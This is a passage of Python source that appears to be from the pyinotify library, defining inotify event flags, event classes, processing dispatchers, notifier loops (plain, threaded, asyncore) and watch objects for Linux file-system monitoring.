@return: stored value. @rtype: int """ oldv = ctypes.c_int(0) size = ctypes.c_int(ctypes.sizeof(oldv)) LIBC.sysctl(self._attr, 3, ctypes.c_voidp(ctypes.addressof(oldv)), ctypes.addressof(size), None, 0) return oldv.value def set_val(self, nval): """ Sets new attribute's value. @param nval: replaces current value by nval. @type nval: int """ oldv = ctypes.c_int(0) sizeo = ctypes.c_int(ctypes.sizeof(oldv)) newv = ctypes.c_int(nval) sizen = ctypes.c_int(ctypes.sizeof(newv)) LIBC.sysctl(self._attr, 3, ctypes.c_voidp(ctypes.addressof(oldv)), ctypes.addressof(sizeo), ctypes.c_voidp(ctypes.addressof(newv)), ctypes.addressof(sizen)) value = property(get_val, set_val) def __repr__(self): return '<%s=%d>' % (self._attrname, self.get_val()) # Singleton instances # # read: myvar = max_queued_events.value # update: max_queued_events.value = 42 # for attrname in ('max_queued_events', 'max_user_instances', 'max_user_watches'): globals()[attrname] = SysCtlINotify(attrname) class EventsCodes: """ Set of codes corresponding to each kind of events. Some of these flags are used to communicate with inotify, whereas the others are sent to userspace by inotify notifying some events. @cvar IN_ACCESS: File was accessed. @type IN_ACCESS: int @cvar IN_MODIFY: File was modified. @type IN_MODIFY: int @cvar IN_ATTRIB: Metadata changed. @type IN_ATTRIB: int @cvar IN_CLOSE_WRITE: Writtable file was closed. @type IN_CLOSE_WRITE: int @cvar IN_CLOSE_NOWRITE: Unwrittable file closed. @type IN_CLOSE_NOWRITE: int @cvar IN_OPEN: File was opened. @type IN_OPEN: int @cvar IN_MOVED_FROM: File was moved from X. @type IN_MOVED_FROM: int @cvar IN_MOVED_TO: File was moved to Y. @type IN_MOVED_TO: int @cvar IN_CREATE: Subfile was created. @type IN_CREATE: int @cvar IN_DELETE: Subfile was deleted. @type IN_DELETE: int @cvar IN_DELETE_SELF: Self (watched item itself) was deleted. @type IN_DELETE_SELF: int @cvar IN_MOVE_SELF: Self (watched item itself) was moved. @type IN_MOVE_SELF: int @cvar IN_UNMOUNT: Backing fs was unmounted. @type IN_UNMOUNT: int @cvar IN_Q_OVERFLOW: Event queued overflowed. @type IN_Q_OVERFLOW: int @cvar IN_IGNORED: File was ignored. @type IN_IGNORED: int @cvar IN_ONLYDIR: only watch the path if it is a directory (new in kernel 2.6.15). @type IN_ONLYDIR: int @cvar IN_DONT_FOLLOW: don't follow a symlink (new in kernel 2.6.15). IN_ONLYDIR we can make sure that we don't watch the target of symlinks. @type IN_DONT_FOLLOW: int @cvar IN_MASK_ADD: add to the mask of an already existing watch (new in kernel 2.6.14). @type IN_MASK_ADD: int @cvar IN_ISDIR: Event occurred against dir. @type IN_ISDIR: int @cvar IN_ONESHOT: Only send event once. @type IN_ONESHOT: int @cvar ALL_EVENTS: Alias for considering all of the events. @type ALL_EVENTS: int """ # The idea here is 'configuration-as-code' - this way, we get our nice class # constants, but we also get nice human-friendly text mappings to do lookups # against as well, for free: FLAG_COLLECTIONS = {'OP_FLAGS': { 'IN_ACCESS' : 0x00000001, # File was accessed 'IN_MODIFY' : 0x00000002, # File was modified 'IN_ATTRIB' : 0x00000004, # Metadata changed 'IN_CLOSE_WRITE' : 0x00000008, # Writable file was closed 'IN_CLOSE_NOWRITE' : 0x00000010, # Unwritable file closed 'IN_OPEN' : 0x00000020, # File was opened 'IN_MOVED_FROM' : 0x00000040, # File was moved from X 'IN_MOVED_TO' : 0x00000080, # File was moved to Y 'IN_CREATE' : 0x00000100, # Subfile was created 'IN_DELETE' : 0x00000200, # Subfile was deleted 'IN_DELETE_SELF' : 0x00000400, # Self (watched item itself) # was deleted 'IN_MOVE_SELF' : 0x00000800, # Self (watched item itself) was moved }, 'EVENT_FLAGS': { 'IN_UNMOUNT' : 0x00002000, # Backing fs was unmounted 'IN_Q_OVERFLOW' : 0x00004000, # Event queued overflowed 'IN_IGNORED' : 0x00008000, # File was ignored }, 'SPECIAL_FLAGS': { 'IN_ONLYDIR' : 0x01000000, # only watch the path if it is a # directory 'IN_DONT_FOLLOW' : 0x02000000, # don't follow a symlink 'IN_MASK_ADD' : 0x20000000, # add to the mask of an already # existing watch 'IN_ISDIR' : 0x40000000, # event occurred against dir 'IN_ONESHOT' : 0x80000000, # only send event once }, } def maskname(mask): """ Returns the event name associated to mask. IN_ISDIR is appended to the result when appropriate. Note: only one event is returned, because only one event can be raised at a given time. @param mask: mask. @type mask: int @return: event name. @rtype: str """ ms = mask name = '%s' if mask & IN_ISDIR: ms = mask - IN_ISDIR name = '%s|IN_ISDIR' return name % EventsCodes.ALL_VALUES[ms] maskname = staticmethod(maskname) # So let's now turn the configuration into code EventsCodes.ALL_FLAGS = {} EventsCodes.ALL_VALUES = {} for flagc, valc in EventsCodes.FLAG_COLLECTIONS.items(): # Make the collections' members directly accessible through the # class dictionary setattr(EventsCodes, flagc, valc) # Collect all the flags under a common umbrella EventsCodes.ALL_FLAGS.update(valc) # Make the individual masks accessible as 'constants' at globals() scope # and masknames accessible by values. for name, val in valc.items(): globals()[name] = val EventsCodes.ALL_VALUES[val] = name # all 'normal' events ALL_EVENTS = reduce(lambda x, y: x | y, EventsCodes.OP_FLAGS.values()) EventsCodes.ALL_FLAGS['ALL_EVENTS'] = ALL_EVENTS EventsCodes.ALL_VALUES[ALL_EVENTS] = 'ALL_EVENTS' class _Event: """ Event structure, represent events raised by the system. This is the base class and should be subclassed. """ def __init__(self, dict_): """ Attach attributes (contained in dict_) to self. @param dict_: Set of attributes. @type dict_: dictionary """ for tpl in dict_.items(): setattr(self, *tpl) def __repr__(self): """ @return: Generic event string representation. @rtype: str """ s = '' for attr, value in sorted(self.__dict__.items(), key=lambda x: x[0]): if attr.startswith('_'): continue if attr == 'mask': value = hex(getattr(self, attr)) elif isinstance(value, str) and not value: value = "''" s += ' %s%s%s' % (output_format.field_name(attr), output_format.punctuation('='), output_format.field_value(value)) s = '%s%s%s %s' % (output_format.punctuation('<'), output_format.class_name(self.__class__.__name__), s, output_format.punctuation('>')) return s def __str__(self): return repr(self) class _RawEvent(_Event): """ Raw event, it contains only the informations provided by the system. It doesn't infer anything. """ def __init__(self, wd, mask, cookie, name): """ @param wd: Watch Descriptor. @type wd: int @param mask: Bitmask of events. @type mask: int @param cookie: Cookie. @type cookie: int @param name: Basename of the file or directory against which the event was raised in case where the watched directory is the parent directory. None if the event was raised on the watched item itself. @type name: string or None """ # Use this variable to cache the result of str(self), this object # is immutable. self._str = None # name: remove trailing '\0' d = {'wd': wd, 'mask': mask, 'cookie': cookie, 'name': name.rstrip('\0')} _Event.__init__(self, d) log.debug(str(self)) def __str__(self): if self._str is None: self._str = _Event.__str__(self) return self._str class Event(_Event): """ This class contains all the useful informations about the observed event. However, the presence of each field is not guaranteed and depends on the type of event. In effect, some fields are irrelevant for some kind of event (for example 'cookie' is meaningless for IN_CREATE whereas it is mandatory for IN_MOVE_TO). The possible fields are: - wd (int): Watch Descriptor. - mask (int): Mask. - maskname (str): Readable event name. - path (str): path of the file or directory being watched. - name (str): Basename of the file or directory against which the event was raised in case where the watched directory is the parent directory. None if the event was raised on the watched item itself. This field is always provided even if the string is ''. - pathname (str): Concatenation of 'path' and 'name'. - src_pathname (str): Only present for IN_MOVED_TO events and only in the case where IN_MOVED_FROM events are watched too. Holds the source pathname from where pathname was moved from. - cookie (int): Cookie. - dir (bool): True if the event was raised against a directory. """ def __init__(self, raw): """ Concretely, this is the raw event plus inferred infos. """ _Event.__init__(self, raw) self.maskname = EventsCodes.maskname(self.mask) if COMPATIBILITY_MODE: self.event_name = self.maskname try: if self.name: self.pathname = os.path.abspath(os.path.join(self.path, self.name)) else: self.pathname = os.path.abspath(self.path) except AttributeError as err: # Usually it is not an error some events are perfectly valids # despite the lack of these attributes. log.debug(err) class ProcessEventError(PyinotifyError): """ ProcessEventError Exception. Raised on ProcessEvent error. """ def __init__(self, err): """ @param err: Exception error description. @type err: string """ PyinotifyError.__init__(self, err) class _ProcessEvent: """ Abstract processing event class. """ def __call__(self, event): """ To behave like a functor the object must be callable. This method is a dispatch method. Its lookup order is: 1. process_MASKNAME method 2. process_FAMILY_NAME method 3. otherwise calls process_default @param event: Event to be processed. @type event: Event object @return: By convention when used from the ProcessEvent class: - Returning False or None (default value) means keep on executing next chained functors (see chain.py example). - Returning True instead means do not execute next processing functions. @rtype: bool @raise ProcessEventError: Event object undispatchable, unknown event. """ stripped_mask = event.mask - (event.mask & IN_ISDIR) maskname = EventsCodes.ALL_VALUES.get(stripped_mask) if maskname is None: raise ProcessEventError("Unknown mask 0x%08x" % stripped_mask) # 1- look for process_MASKNAME meth = getattr(self, 'process_' + maskname, None) if meth is not None: return meth(event) # 2- look for process_FAMILY_NAME meth = getattr(self, 'process_IN_' + maskname.split('_')[1], None) if meth is not None: return meth(event) # 3- default call method process_default return self.process_default(event) def __repr__(self): return '<%s>' % self.__class__.__name__ class _SysProcessEvent(_ProcessEvent): """ There is three kind of processing according to each event: 1. special handling (deletion from internal container, bug, ...). 2. default treatment: which is applied to the majority of events. 3. IN_ISDIR is never sent alone, he is piggybacked with a standard event, he is not processed as the others events, instead, its value is captured and appropriately aggregated to dst event. """ def __init__(self, wm, notifier): """ @param wm: Watch Manager. @type wm: WatchManager instance @param notifier: Notifier. @type notifier: Notifier instance """ self._watch_manager = wm # watch manager self._notifier = notifier # notifier self._mv_cookie = {} # {cookie(int): (src_path(str), date), ...} self._mv = {} # {src_path(str): (dst_path(str), date), ...} def cleanup(self): """ Cleanup (delete) old (>1mn) records contained in self._mv_cookie and self._mv. """ date_cur_ = datetime.now() for seq in (self._mv_cookie, self._mv): for k in list(seq.keys()): if (date_cur_ - seq[k][1]) > timedelta(minutes=1): log.debug('Cleanup: deleting entry %s', seq[k][0]) del seq[k] def process_IN_CREATE(self, raw_event): """ If the event affects a directory and the auto_add flag of the targetted watch is set to True, a new watch is added on this new directory, with the same attribute values than those of this watch. """ if raw_event.mask & IN_ISDIR: watch_ = self._watch_manager.get_watch(raw_event.wd) created_dir = os.path.join(watch_.path, raw_event.name) if watch_.auto_add and not watch_.exclude_filter(created_dir): addw = self._watch_manager.add_watch # The newly monitored directory inherits attributes from its # parent directory. addw_ret = addw(created_dir, watch_.mask, proc_fun=watch_.proc_fun, rec=False, auto_add=watch_.auto_add, exclude_filter=watch_.exclude_filter) # Trick to handle mkdir -p /t1/t2/t3 where t1 is watched and # t2 and t3 are created. # Since the directory is new, then everything inside it # must also be new. created_dir_wd = addw_ret.get(created_dir) if (created_dir_wd is not None) and created_dir_wd > 0: for name in os.listdir(created_dir): inner = os.path.join(created_dir, name) if (os.path.isdir(inner) and self._watch_manager.get_wd(inner) is None): # Generate (simulate) creation event for sub # directories. rawevent = _RawEvent(created_dir_wd, IN_CREATE | IN_ISDIR, 0, name) self._notifier.append_event(rawevent) return self.process_default(raw_event) def process_IN_MOVED_FROM(self, raw_event): """ Map the cookie with the source path (+ date for cleaning). """ watch_ = self._watch_manager.get_watch(raw_event.wd) path_ = watch_.path src_path = os.path.normpath(os.path.join(path_, raw_event.name)) self._mv_cookie[raw_event.cookie] = (src_path, datetime.now()) return self.process_default(raw_event, {'cookie': raw_event.cookie}) def process_IN_MOVED_TO(self, raw_event): """ Map the source path with the destination path (+ date for cleaning). """ watch_ = self._watch_manager.get_watch(raw_event.wd) path_ = watch_.path dst_path = os.path.normpath(os.path.join(path_, raw_event.name)) mv_ = self._mv_cookie.get(raw_event.cookie) to_append = {'cookie': raw_event.cookie} if mv_ is not None: self._mv[mv_[0]] = (dst_path, datetime.now()) # Let's assume that IN_MOVED_FROM event is always queued before # that its associated (they share a common cookie) IN_MOVED_TO # event is queued itself. It is then possible in that scenario # to provide as additional information to the IN_MOVED_TO event # the original pathname of the moved file/directory. to_append['src_pathname'] = mv_[0] elif (raw_event.mask & IN_ISDIR and watch_.auto_add and not watch_.exclude_filter(dst_path)): # We got a diretory that's "moved in" from an unknown source and # auto_add is enabled. Manually add watches to the inner subtrees. # The newly monitored directory inherits attributes from its # parent directory. self._watch_manager.add_watch(dst_path, watch_.mask, proc_fun=watch_.proc_fun, rec=True, auto_add=True, exclude_filter=watch_.exclude_filter) return self.process_default(raw_event, to_append) def process_IN_MOVE_SELF(self, raw_event): """ STATUS: the following bug has been fixed in recent kernels (FIXME: which version ?). Now it raises IN_DELETE_SELF instead. Old kernels were bugged, this event raised when the watched item were moved, so we had to update its path, but under some circumstances it was impossible: if its parent directory and its destination directory wasn't watched. The kernel (see include/linux/fsnotify.h) doesn't bring us enough informations like the destination path of moved items. """ watch_ = self._watch_manager.get_watch(raw_event.wd) src_path = watch_.path mv_ = self._mv.get(src_path) if mv_: dest_path = mv_[0] watch_.path = dest_path # add the separator to the source path to avoid overlapping # path issue when testing with startswith() src_path += os.path.sep src_path_len = len(src_path) # The next loop renames all watches with src_path as base path. # It seems that IN_MOVE_SELF does not provide IN_ISDIR information # therefore the next loop is iterated even if raw_event is a file. for w in self._watch_manager.watches.values(): if w.path.startswith(src_path): # Note that dest_path is a normalized path. w.path = os.path.join(dest_path, w.path[src_path_len:]) else: log.error("The pathname '%s' of this watch %s has probably changed " "and couldn't be updated, so it cannot be trusted " "anymore. To fix this error move directories/files only " "between watched parents directories, in this case e.g. " "put a watch on '%s'.", watch_.path, watch_, os.path.normpath(os.path.join(watch_.path, os.path.pardir))) if not watch_.path.endswith('-unknown-path'): watch_.path += '-unknown-path' return self.process_default(raw_event) def process_IN_Q_OVERFLOW(self, raw_event): """ Only signal an overflow, most of the common flags are irrelevant for this event (path, wd, name). """ return Event({'mask': raw_event.mask}) def process_IN_IGNORED(self, raw_event): """ The watch descriptor raised by this event is now ignored (forever), it can be safely deleted from the watch manager dictionary. After this event we can be sure that neither the event queue nor the system will raise an event associated to this wd again. """ event_ = self.process_default(raw_event) self._watch_manager.del_watch(raw_event.wd) return event_ def process_default(self, raw_event, to_append=None): """ Commons handling for the followings events: IN_ACCESS, IN_MODIFY, IN_ATTRIB, IN_CLOSE_WRITE, IN_CLOSE_NOWRITE, IN_OPEN, IN_DELETE, IN_DELETE_SELF, IN_UNMOUNT. """ watch_ = self._watch_manager.get_watch(raw_event.wd) if raw_event.mask & (IN_DELETE_SELF | IN_MOVE_SELF): # Unfornulately this information is not provided by the kernel dir_ = watch_.dir else: dir_ = bool(raw_event.mask & IN_ISDIR) dict_ = {'wd': raw_event.wd, 'mask': raw_event.mask, 'path': watch_.path, 'name': raw_event.name, 'dir': dir_} if COMPATIBILITY_MODE: dict_['is_dir'] = dir_ if to_append is not None: dict_.update(to_append) return Event(dict_) class ProcessEvent(_ProcessEvent): """ Process events objects, can be specialized via subclassing, thus its behavior can be overriden: Note: you should not override __init__ in your subclass instead define a my_init() method, this method will be called automatically from the constructor of this class with its optionals parameters. 1. Provide specialized individual methods, e.g. process_IN_DELETE for processing a precise type of event (e.g. IN_DELETE in this case). 2. Or/and provide methods for processing events by 'family', e.g. process_IN_CLOSE method will process both IN_CLOSE_WRITE and IN_CLOSE_NOWRITE events (if process_IN_CLOSE_WRITE and process_IN_CLOSE_NOWRITE aren't defined though). 3. Or/and override process_default for catching and processing all the remaining types of events. """ pevent = None def __init__(self, pevent=None, **kargs): """ Enable chaining of ProcessEvent instances. @param pevent: Optional callable object, will be called on event processing (before self). @type pevent: callable @param kargs: This constructor is implemented as a template method delegating its optionals keyworded arguments to the method my_init(). @type kargs: dict """ self.pevent = pevent self.my_init(**kargs) def my_init(self, **kargs): """ This method is called from ProcessEvent.__init__(). This method is empty here and must be redefined to be useful. In effect, if you need to specifically initialize your subclass' instance then you just have to override this method in your subclass. Then all the keyworded arguments passed to ProcessEvent.__init__() will be transmitted as parameters to this method. Beware you MUST pass keyword arguments though. @param kargs: optional delegated arguments from __init__(). @type kargs: dict """ pass def __call__(self, event): stop_chaining = False if self.pevent is not None: # By default methods return None so we set as guideline # that methods asking for stop chaining must explicitely # return non None or non False values, otherwise the default # behavior will be to accept chain call to the corresponding # local method. stop_chaining = self.pevent(event) if not stop_chaining: return _ProcessEvent.__call__(self, event) def nested_pevent(self): return self.pevent def process_IN_Q_OVERFLOW(self, event): """ By default this method only reports warning messages, you can overredide it by subclassing ProcessEvent and implement your own process_IN_Q_OVERFLOW method. The actions you can take on receiving this event is either to update the variable max_queued_events in order to handle more simultaneous events or to modify your code in order to accomplish a better filtering diminishing the number of raised events. Because this method is defined, IN_Q_OVERFLOW will never get transmitted as arguments to process_default calls. @param event: IN_Q_OVERFLOW event. @type event: dict """ log.warning('Event queue overflowed.') def process_default(self, event): """ Default processing event method. By default does nothing. Subclass ProcessEvent and redefine this method in order to modify its behavior. @param event: Event to be processed. Can be of any type of events but IN_Q_OVERFLOW events (see method process_IN_Q_OVERFLOW). @type event: Event instance """ pass class PrintAllEvents(ProcessEvent): """ Dummy class used to print events strings representations. For instance this class is used from command line to print all received events to stdout. """ def my_init(self, out=None): """ @param out: Where events will be written. @type out: Object providing a valid file object interface. """ if out is None: out = sys.stdout self._out = out def process_default(self, event): """ Writes event string representation to file object provided to my_init(). @param event: Event to be processed. Can be of any type of events but IN_Q_OVERFLOW events (see method process_IN_Q_OVERFLOW). @type event: Event instance """ self._out.write(str(event)) self._out.write('\n') self._out.flush() class ChainIfTrue(ProcessEvent): """ Makes conditional chaining depending on the result of the nested processing instance. """ def my_init(self, func): """ Method automatically called from base class constructor. """ self._func = func def process_default(self, event): return not self._func(event) class Stats(ProcessEvent): """ Compute and display trivial statistics about processed events. """ def my_init(self): """ Method automatically called from base class constructor. """ self._start_time = time.time() self._stats = {} self._stats_lock = threading.Lock() def process_default(self, event): """ Processes |event|. """ self._stats_lock.acquire() try: events = event.maskname.split('|') for event_name in events: count = self._stats.get(event_name, 0) self._stats[event_name] = count + 1 finally: self._stats_lock.release() def _stats_copy(self): self._stats_lock.acquire() try: return self._stats.copy() finally: self._stats_lock.release() def __repr__(self): stats = self._stats_copy() elapsed = int(time.time() - self._start_time) elapsed_str = '' if elapsed < 60: elapsed_str = str(elapsed) + 'sec' elif 60 <= elapsed < 3600: elapsed_str = '%dmn%dsec' % (elapsed / 60, elapsed % 60) elif 3600 <= elapsed < 86400: elapsed_str = '%dh%dmn' % (elapsed / 3600, (elapsed % 3600) / 60) elif elapsed >= 86400: elapsed_str = '%dd%dh' % (elapsed / 86400, (elapsed % 86400) / 3600) stats['ElapsedTime'] = elapsed_str l = [] for ev, value in sorted(stats.items(), key=lambda x: x[0]): l.append(' %s=%s' % (output_format.field_name(ev), output_format.field_value(value))) s = '<%s%s >' % (output_format.class_name(self.__class__.__name__), ''.join(l)) return s def dump(self, filename): """ Dumps statistics to file |filename|. @param filename: pathname. @type filename: string """ with open(filename, 'w') as file_obj: file_obj.write(str(self)) def __str__(self, scale=45): stats = self._stats_copy() if not stats: return '' m = max(stats.values()) unity = scale / m fmt = '%%-26s%%-%ds%%s' % (len(output_format.field_value('@' * scale)) + 1) def func(x): return fmt % (output_format.field_name(x[0]), output_format.field_value('@' * int(x[1] * unity)), output_format.simple('%d' % x[1], 'yellow')) s = '\n'.join(map(func, sorted(stats.items(), key=lambda x: x[0]))) return s class NotifierError(PyinotifyError): """ Notifier Exception. Raised on Notifier error. """ def __init__(self, err): """ @param err: Exception string's description. @type err: string """ PyinotifyError.__init__(self, err) class Notifier: """ Read notifications, process events. """ def __init__(self, watch_manager, default_proc_fun=None, read_freq=0, threshold=0, timeout=None): """ Initialization. read_freq, threshold and timeout parameters are used when looping. @param watch_manager: Watch Manager. @type watch_manager: WatchManager instance @param default_proc_fun: Default processing method. If None, a new instance of PrintAllEvents will be assigned. @type default_proc_fun: instance of ProcessEvent @param read_freq: if read_freq == 0, events are read asap, if read_freq is > 0, this thread sleeps max(0, read_freq - timeout) seconds. But if timeout is None it may be different because poll is blocking waiting for something to read. @type read_freq: int @param threshold: File descriptor will be read only if the accumulated size to read becomes >= threshold. If != 0, you likely want to use it in combination with an appropriate value for read_freq because without that you would keep looping without really reading anything and that until the amount of events to read is >= threshold. At least with read_freq set you might sleep. @type threshold: int @param timeout: http://docs.python.org/lib/poll-objects.html#poll-objects @type timeout: int """ # Watch Manager instance self._watch_manager = watch_manager # File descriptor self._fd = self._watch_manager.get_fd() # Poll object and registration self._pollobj = select.poll() self._pollobj.register(self._fd, select.POLLIN) # This pipe is correctely initialized and used by ThreadedNotifier self._pipe = (-1, -1) # Event queue self._eventq = deque() # System processing functor, common to all events self._sys_proc_fun = _SysProcessEvent(self._watch_manager, self) # Default processing method self._default_proc_fun = default_proc_fun if default_proc_fun is None: self._default_proc_fun = PrintAllEvents() # Loop parameters self._read_freq = read_freq self._threshold = threshold self._timeout = timeout # Coalesce events option self._coalesce = False # set of str(raw_event), only used when coalesce option is True self._eventset = set() def append_event(self, event): """ Append a raw event to the event queue. @param event: An event. @type event: _RawEvent instance. """ self._eventq.append(event) def proc_fun(self): return self._default_proc_fun def coalesce_events(self, coalesce=True): """ Coalescing events. Events are usually processed by batchs, their size depend on various factors. Thus, before processing them, events received from inotify are aggregated in a fifo queue. If this coalescing option is enabled events are filtered based on their unicity, only unique events are enqueued, doublons are discarded. An event is unique when the combination of its fields (wd, mask, cookie, name) is unique among events of a same batch. After a batch of events is processed any events is accepted again. By default this option is disabled, you have to explictly call this function to turn it on. @param coalesce: Optional new coalescing value. True by default. @type coalesce: Bool """ self._coalesce = coalesce if not coalesce: self._eventset.clear() def check_events(self, timeout=None): """ Check for new events available to read, blocks up to timeout milliseconds. @param timeout: If specified it overrides the corresponding instance attribute _timeout. @type timeout: int @return: New events to read. @rtype: bool """ while True: try: # blocks up to 'timeout' milliseconds if timeout is None: timeout = self._timeout ret = self._pollobj.poll(timeout) except select.error as err: if err.errno == errno.EINTR: continue # interrupted, retry else: raise else: break if not ret or (self._pipe[0] == ret[0][0]): return False # only one fd is polled return ret[0][1] & select.POLLIN def read_events(self): """ Read events from device, build _RawEvents, and enqueue them. """ buf_ = array.array('i', [0]) # get event queue size if fcntl.ioctl(self._fd, termios.FIONREAD, buf_, 1) == -1: return queue_size = buf_[0] if queue_size < self._threshold: log.debug('(fd: %d) %d bytes available to read but threshold is ' 'fixed to %d bytes', self._fd, queue_size, self._threshold) return try: # Read content from file r = os.read(self._fd, queue_size) except Exception as msg: raise NotifierError(msg) log.debug('Event queue size: %d', queue_size) rsum = 0 # counter while rsum < queue_size: s_size = 16 # Retrieve wd, mask, cookie and fname_len wd, mask, cookie, fname_len = struct.unpack('iIII', r[rsum:rsum+s_size]) # Retrieve name bname, = struct.unpack('%ds' % fname_len, r[rsum + s_size:rsum + s_size + fname_len]) # FIXME: should we explictly call sys.getdefaultencoding() here ?? uname = bname.decode() rawevent = _RawEvent(wd, mask, cookie, uname) if self._coalesce: # Only enqueue new (unique) events. raweventstr = str(rawevent) if raweventstr not in self._eventset: self._eventset.add(raweventstr) self._eventq.append(rawevent) else: self._eventq.append(rawevent) rsum += s_size + fname_len def process_events(self): """ Routine for processing events from queue by calling their associated proccessing method (an instance of ProcessEvent). It also does internal processings, to keep the system updated. """ while self._eventq: raw_event = self._eventq.popleft() # pop next event watch_ = self._watch_manager.get_watch(raw_event.wd) if watch_ is None: # Not really sure how we ended up here, nor how we should # handle these types of events and if it is appropriate to # completly skip them (like we are doing here). log.warning("Unable to retrieve Watch object associated to %s", repr(raw_event)) continue revent = self._sys_proc_fun(raw_event) # system processings if watch_ and watch_.proc_fun: watch_.proc_fun(revent) # user processings else: self._default_proc_fun(revent) self._sys_proc_fun.cleanup() # remove olds MOVED_* events records if self._coalesce: self._eventset.clear() def __daemonize(self, pid_file=None, force_kill=False, stdin=os.devnull, stdout=os.devnull, stderr=os.devnull): """ pid_file: file to which the pid will be written. force_kill: if True kill the process associated to pid_file. stdin, stdout, stderr: files associated to common streams. """ if pid_file is None: dirname = '/var/run/' basename = os.path.basename(sys.argv[0]) or 'pyinotify' pid_file = os.path.join(dirname, basename + '.pid') if os.path.exists(pid_file): with open(pid_file, 'r') as fo: try: pid = int(fo.read()) except ValueError: pid = None if pid is not None: try: os.kill(pid, 0) except OSError as err: if err.errno == errno.ESRCH: log.debug(err) else: log.error(err) else: if not force_kill: s = 'There is already a pid file %s with pid %d' raise NotifierError(s % (pid_file, pid)) else: os.kill(pid, 9) def fork_daemon(): # Adapted from Chad J. Schroeder's recipe # @see http://code.activestate.com/recipes/278731/ pid = os.fork() if (pid == 0): # parent 2 os.setsid() pid = os.fork() if (pid == 0): # child os.chdir('/') os.umask(0) else: # parent 2 os._exit(0) else: # parent 1 os._exit(0) fd_inp = open(stdin, 'r') os.dup2(fd_inp.fileno(), 0) fd_out = open(stdout, 'w') os.dup2(fd_out.fileno(), 1) fd_err = open(stderr, 'w') os.dup2(fd_err.fileno(), 2) # Detach task fork_daemon() # Write pid with open(pid_file, 'w') as file_obj: file_obj.write(str(os.getpid()) + '\n') atexit.register(lambda : os.unlink(pid_file)) def _sleep(self, ref_time): # Only consider sleeping if read_freq is > 0 if self._read_freq > 0: cur_time = time.time() sleep_amount = self._read_freq - (cur_time - ref_time) if sleep_amount > 0: log.debug('Now sleeping %d seconds', sleep_amount) time.sleep(sleep_amount) def loop(self, callback=None, daemonize=False, **args): """ Events are read only one time every min(read_freq, timeout) seconds at best and only if the size to read is >= threshold. After this method returns it must not be called again for the same instance. @param callback: Functor called after each event processing iteration. Expects to receive the notifier object (self) as first parameter. If this function returns True the loop is immediately terminated otherwise the loop method keeps looping. @type callback: callable object or function @param daemonize: This thread is daemonized if set to True. @type daemonize: boolean @param args: Optional and relevant only if daemonize is True. Remaining keyworded arguments are directly passed to daemonize see __daemonize() method. @type args: various """ if daemonize: self.__daemonize(**args) # Read and process events forever while 1: try: self.process_events() if (callback is not None) and (callback(self) is True): break ref_time = time.time() # check_events is blocking if self.check_events(): self._sleep(ref_time) self.read_events() except KeyboardInterrupt: # Stop monitoring if sigint is caught (Control-C). log.debug('Pyinotify stops monitoring.') break # Close internals self.stop() def stop(self): """ Close inotify's instance (close its file descriptor). It destroys all existing watches, pending events,... This method is automatically called at the end of loop(). """ self._pollobj.unregister(self._fd) os.close(self._fd) class ThreadedNotifier(threading.Thread, Notifier): """ This notifier inherits from threading.Thread for instanciating a separate thread, and also inherits from Notifier, because it is a threaded notifier. Note that every functionality provided by this class is also provided through Notifier class. Moreover Notifier should be considered first because it is not threaded and could be easily daemonized. """ def __init__(self, watch_manager, default_proc_fun=None, read_freq=0, threshold=0, timeout=None): """ Initialization, initialize base classes. read_freq, threshold and timeout parameters are used when looping. @param watch_manager: Watch Manager. @type watch_manager: WatchManager instance @param default_proc_fun: Default processing method. See base class. @type default_proc_fun: instance of ProcessEvent @param read_freq: if read_freq == 0, events are read asap, if read_freq is > 0, this thread sleeps max(0, read_freq - timeout) seconds. @type read_freq: int @param threshold: File descriptor will be read only if the accumulated size to read becomes >= threshold. If != 0, you likely want to use it in combination with an appropriate value set for read_freq because without that you would keep looping without really reading anything and that until the amount of events to read is >= threshold. At least with read_freq you might sleep. @type threshold: int @param timeout: see http://docs.python.org/lib/poll-objects.html#poll-objects @type timeout: int """ # Init threading base class threading.Thread.__init__(self) # Stop condition self._stop_event = threading.Event() # Init Notifier base class Notifier.__init__(self, watch_manager, default_proc_fun, read_freq, threshold, timeout) # Create a new pipe used for thread termination self._pipe = os.pipe() self._pollobj.register(self._pipe[0], select.POLLIN) def stop(self): """ Stop notifier's loop. Stop notification. Join the thread. """ self._stop_event.set() os.write(self._pipe[1], b'stop') threading.Thread.join(self) Notifier.stop(self) self._pollobj.unregister(self._pipe[0]) os.close(self._pipe[0]) os.close(self._pipe[1]) def loop(self): """ Thread's main loop. Don't meant to be called by user directly. Call inherited start() method instead. Events are read only once time every min(read_freq, timeout) seconds at best and only if the size of events to read is >= threshold. """ # When the loop must be terminated .stop() is called, 'stop' # is written to pipe fd so poll() returns and .check_events() # returns False which make evaluate the While's stop condition # ._stop_event.isSet() wich put an end to the thread's execution. while not self._stop_event.isSet(): self.process_events() ref_time = time.time() if self.check_events(): self._sleep(ref_time) self.read_events() def run(self): """ Start thread's loop: read and process events until the method stop() is called. Never call this method directly, instead call the start() method inherited from threading.Thread, which then will call run() in its turn. """ self.loop() class AsyncNotifier(asyncore.file_dispatcher, Notifier): """ This notifier inherits from asyncore.file_dispatcher in order to be able to use pyinotify along with the asyncore framework. """ def __init__(self, watch_manager, default_proc_fun=None, read_freq=0, threshold=0, timeout=None, channel_map=None): """ Initializes the async notifier. The only additional parameter is 'channel_map' which is the optional asyncore private map. See Notifier class for the meaning of the others parameters. """ Notifier.__init__(self, watch_manager, default_proc_fun, read_freq, threshold, timeout) asyncore.file_dispatcher.__init__(self, self._fd, channel_map) def handle_read(self): """ When asyncore tells us we can read from the fd, we proceed processing events. This method can be overridden for handling a notification differently. """ self.read_events() self.process_events() class Watch: """ Represent a watch, i.e. a file or directory being watched. """ def __init__(self, wd, path, mask, proc_fun, auto_add, exclude_filter): """ Initializations. @param wd: Watch descriptor. @type wd: int @param path: Path of the file or directory being watched. @type path: str @param mask: Mask. @type mask: int @param proc_fun: Processing callable object. @type proc_fun: @param auto_add: Automatically add watches on new directories. @type auto_add: bool @param exclude_filter: Boolean function, used to exclude new directories from being automatically watched. See WatchManager.__init__ @type exclude_filter: callable object """ self.wd = wd self.path = path self.mask = mask self.proc_fun = proc_fun self.auto_add = auto_add self.exclude_filter = exclude_filter self.dir = os.path.isdir(self.path) def __repr__(self): """ @return: String representation. @rtype: str """ s = ' '.join(['%s%s%s' % (output_format.field_name(attr), output_format.punctuation('='), output_format.field_value(getattr(self, attr))) \ for attr in self.__dict__ if not attr.startswith('_')]) s = '%s%s %s %s' % (output_format.punctuation('<'), output_format.class_name(self.__class__.__name__), s, output_format.punctuation('>')) return s class ExcludeFilter: """ ExcludeFilter is an exclusion filter. """ def 